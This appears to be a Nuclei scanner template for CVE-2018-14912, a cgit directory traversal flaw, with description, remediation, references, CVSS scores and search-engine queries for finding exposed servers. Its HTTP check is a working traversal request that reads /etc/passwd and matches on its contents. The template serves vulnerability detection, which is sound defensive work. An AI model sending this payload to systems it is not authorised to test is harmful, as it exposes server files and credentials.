id: CVE-2018-14912 info: name: cgit < 1.2.1 - Directory Traversal author: 0x_Akoko severity: high description: cGit < 1.2.1 via cgit_clone_objects has a directory traversal vulnerability when `enable-http-clone=1` is not turned off, as demonstrated by a cgit/cgit.cgi/git/objects/?path=../ request. impact: | Unauthenticated attackers can access arbitrary files on the server through path traversal in cgit when HTTP clone functionality is enabled, potentially exposing sensitive repository data, source code, configuration files, and credentials. remediation: | Upgrade cgit to version 1.2.1 or later to mitigate the vulnerability. reference: - https://cxsecurity.com/issue/WLB-2018080034 - https://nvd.nist.gov/vuln/detail/CVE-2018-14912 - https://lists.zx2c4.com/pipermail/cgit/2018-August/004176.html - https://bugs.chromium.org/p/project-zero/issues/detail?id=1627 - https://lists.debian.org/debian-lts-announce/2018/08/msg00005.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-14912 cwe-id: CWE-22 epss-score: 0.93188 epss-percentile: 0.99823 cpe: cpe:2.3:a:cgit_project:cgit:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cgit_project product: cgit shodan-query: http.title:"git repository browser" fofa-query: title="git repository browser" google-query: intitle:"git repository browser" tags: cve,cve2018,cgit,lfi,cgit_project,vkev,vuln http: - method: GET path: - "{{BaseURL}}/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd" matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" - type: status status: - 200 # digest: 490a0046304402206d8cc692f763d27da2fe2e60da9b5efcfc4f0a7388855797ce5ea111b7c1ef370220734438296899dd3fb03c376cfa8c50e26c3511e08372f63a43f63e265fcafe39:922c64590222798bb761d5b6d8e72950